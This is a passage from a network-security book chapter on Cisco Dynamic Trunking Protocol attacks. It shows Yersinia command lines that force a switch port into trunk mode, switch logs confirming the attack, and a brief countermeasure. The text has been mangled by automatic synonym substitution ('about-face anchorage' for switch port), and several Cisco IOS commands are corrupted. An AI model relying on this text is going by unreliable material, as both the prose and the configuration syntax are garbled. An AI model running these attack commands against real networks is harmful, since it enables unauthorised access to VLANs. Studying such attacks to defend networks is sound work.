Understanding Cisco Activating Trunking Protocol
To advance the user experience, abounding avant-garde LAN switches abode with a bulk of
mechanisms and protocols that automate network-configuration chores. Cisco Dynamic
Trunking Agreement (DTP) avalanche into that category.
Crafting a DTP Attack
DTP is Cisco-proprietary protocol. Its purpose is to actuate whether two switches that
are affiliated appetite to actualize a trunk. In the accident that both switches assume to agree, a trunk
is automatically brought up with a ambit of mutually adequate parameters, such as
encapsulation and the VLAN range.
NOTE Ample DTP literature3 is accessible in added publications, and it’s above this book’s scope
to awning all agreement aspects or enumerate matrices of accessible DTP combinations. As
a quick reference, actuality is a description of the several altered DTP anchorage states:
• Auto. The anchorage listens for DTP frames from the adjoining switch. If the
neighboring about-face says it wants to be a trunk, or is a trunk, the auto accompaniment creates the
trunk with the adjoining switch. Auto does not bear any absorbed to become an
trunk; it alone depends on the adjoining about-face to accomplish the trunking decision.
• Desirable. DTP is announced to the adjoining switch. Adorable communicates to the
neighboring about-face that it is able of actuality a block and wants the neighboring
switch to additionally be a trunk.
• On. DTP is announced to the adjoining switch. The On accompaniment automatically enables
trunking on the port, behindhand of the accompaniment of its adjoining switch. It charcoal a
trunk unless it receives a DTP packet that absolutely disables the trunk.
Example 4-2 Cisco IOS Agreement for Unconditional Tagging of Frames
CiscoSwitch(config)#vlan dot1q tag native
or
CiscoSwitch(config)#interface GigabitEthernet2/1
CiscoSwitch(config-if)#switchport block built-in vlan tag
Understanding Cisco Activating Trunking Agreement 77
• Nonegotiate. DTP is not announced to the adjoining switch. Nonegotiate
automatically and actually enables trunking on its port, behindhand of the state
of its adjoining switch. This is a accepted ambience against end stations that can
understand trunking (such as VMWare basic machines).
• Off. Trunking is not accustomed on this anchorage behindhand of the DTP approach configured on
the added switch.
The actuality that DTP is a agreement anon rings a alarm to a hacker. Something forth the
lines of, “Let’s see whether I can fool this about-face anchorage into acceptable a block by sending it
a manually crafted DTP frame!,” is a accustomed anticipation for a LAN hacker. If a about-face anchorage has
been configured to accelerate and/or accept to DTP advertisements, a hacker can calmly beset the
port into acceptable a block (see Example 4-3).
The activating port-level agreement indicates to the about-face that it should automatically try
to bulk out what to do with the port. Although DTP eases the agreement of trunks, it is
potentially alarming back enabled on user-facing ports.
If you anticipate ambience up a DTP advance takes a accomplished hacker who’s carefully accustomed with
packet-building libraries, bethink this: There is consistently Yersinia.
Figure 4-7 shows that, already again, back it comes to hacking LAN protocols, Yersinia is up
for the challenge. It comes arranged with a DTP frame-injection bore that allows a hacker
to accelerate any approximate DTP anatomy to the switch. Also, a prebuilt DTP anatomy approach can turn
an biting about-face anchorage into a trunk. If a hacker succeeds and transforms a anchorage into a
trunk, bent VLANs is trivial.
Example 4-3 Configuring a Anchorage to Accelerate and Accept DTP Packets
CiscoSwitch(config-if)#interface g7/8
CiscoSwitch(config-if)#switchport approach ?
access Set trunking approach to ACCESS unconditionally
dot1q-tunnel set trunking approach to TUNNEL unconditionally
dynamic Set trunking approach to dynamically accommodate admission or block mode
private-vlan Set the approach to private-vlan host or promiscuous
trunk Set trunking approach to TRUNK unconditionally
CiscoSwitch(config-if)#switchport approach activating ?
auto Set trunking approach activating agreement constant to AUTO
desirable Set trunking approach activating agreement constant to DESIRABLE
78 Chapter 4: Are VLANS Safe?
Figure 4-7 Yersinia’s DTP Module
Example 4-4 shows the antecedent anchorage agreement of an absolute DTP attack.
Example 4-4 Antecedent Anchorage Agreement for DTP Exploit
CiscoSwitch#show running-config interface f5/14
Building configuration...
Current agreement : 249 bytes
!
interface FastEthernet5/14
description SERVER_ETH1
switchport approach activating desirable
switchport admission vlan 100
no ip address
logging accident link-status
logging accident spanning-tree status
logging accident trunk-status
spanning-tree portfast
end
CiscoSwitch#show interface f5/14 trunk
Port Approach Encapsulation Status Built-in vlan
Fa5/14 adorable accommodate not-trunking 1
Understanding Cisco Activating Trunking Agreement 79
The anchorage is in activating adorable approach and is currently not trunking. Things are about to
change as you blaze up Yersinia:
[root@server sample]# yersinia dtp -v 1 -i eth1 -smac 00:ca:fe:be:ef:00 -dmac
01:00:0C:CC:CC:CC -neighbor 00:00:0c:11:22:33 -domain CISCO -attack 0
Ouch!! Invalid attack!! Valid yersinia ATTACK types are:
1: NONDOS advance sending DTP packet
2: NONDOS advance enabling trunking
MOTD: Do you accept a Lexicon CX-7? Share it!! ;)
A typo was agilely alien in the antecedent command to get Yersinia to account the
range of DTP attacks it can perform. A plain-vanilla DTP packet injector and a prebuilt
frame advance to force the adjoining about-face anchorage to become a trunk. Does the about-face fall
for the additional attack? Here’s the verification:
[root@server sample]# yersinia dtp -v 1 -i eth1 -smac 00:ca:fe:be:ef:00 –dmac
01:00:0C:CC:CC:CC -neighbor 00:00:0c:11:22:33 -domain CISCO -attack 2
<*> Starting NONDOS advance enabling trunking...
<*> Press any key to stop the advance <*>
Two ambit bulk in the antecedent Yersinia command: the destination MAC address
(01:00:0C:CC:CC:CC) and the VLAN Trunking Agreement (VTP) area name. The MAC
address is a Cisco-specific multicast MAC abode acclimated by several LAN protocols, such as
CDP and VTP. DTP uses the Subnetwork Admission Agreement (SNAP) encapsulation, along
with agreement ID 0x2004, to analyze itself because the MAC abode is not sufficient. The
VTP area charge bout the area currently configured on the switch. Some interesting
logs arise on the about-face anon afterwards the attack:
.Jan 25 04:24:45.065: %LINEPROTO-5-UPDOWN: Line agreement on Interface
FastEthernet5/14, afflicted accompaniment to down
Jan 25 04:24:45.054: %LINEPROTO-SP-5-UPDOWN: Line agreement on Interface
FastEthernet5/14, afflicted accompaniment to down
.Jan 25 04:24:48.078: %SVCLC-5-FWTRUNK: Firewalled VLANs configured on trunks
.Jan 25 04:24:48.122: %LINEPROTO-5-UPDOWN: Line agreement on Interface
FastEthernet5/14, afflicted accompaniment to up
Jan 25 04:24:48.107: %LINEPROTO-SP-5-UPDOWN: Line agreement on Interface
FastEthernet5/14, afflicted accompaniment to up
Jan 25 04:24:48.551: %DTP-SP-5-TRUNKPORTON: Anchorage Fa5/14 has become dot1q trunk
Port Vlans accustomed on trunk
Fa5/14 100
Port Vlans accustomed and alive in administration domain
Fa5/14 100
Port Vlans in spanning timberline forwarding accompaniment and not pruned
Fa5/14 100
CiscoSwitch#
Example 4-4 Antecedent Anchorage Agreement for DTP Exploit (Continued)
80 Chapter 4: Are VLANS Safe?
According to the aftermost log message, the anchorage has become a trunk! It’s time to double-check,
as Example 4-5 shows.
Sure enough, it worked! With one simple packet, a hacker gets burning admission to a whopping
range of 4000+ VLANs. This is impressive, because the basal bulk of effort
involved.
Countermeasures to DTP Attacks
Fortunately, the antitoxin to DTP attacks is simple and efficient: Do not leave userfacing
ports in activating agreement mode. Hard-code them as admission ports instead and
place them in a changeless VLAN. This silently drops DTP frames at the anchorage akin with no
performance impact. With DTP frames dropped, attempts to force the anchorage into acceptable a
trunk fail.
Verification of the Port’s New Status
6K-3-S720#show interface f5/14 trunk
Port Approach Encapsulation Status Built-in vlan
Fa5/14 adorable n-802.1q trunking 1
Port Vlans accustomed on trunk
Fa5/14 1-4094
Port Vlans accustomed and alive in administration domain
Fa5/14 1-3,8-13,15,17-22,39,44-46,48-52,55-71,75-76,80-81,85-90,95,100-102,
104,111-112,120-121,130,150-151,161-162,200-204,210,250-251,265,300-301,304,
350-351,400-407,440-445,448,500-503,550,555,600,665-667,701,720,730,740,750,770,
780,800-802,822-823,839,888,900-904,906,921,997-999,1001,1100-1102,1121,1200-
1300,1448,1500-1501,1800-1801,1822,2000-2001,2500,2800,3120-3121,3500,3850-3851,
3900-3901,4000-4003,4094
Port Vlans in spanning timberline forwarding accompaniment and not pruned
Fa5/14 none
6K-3-S720#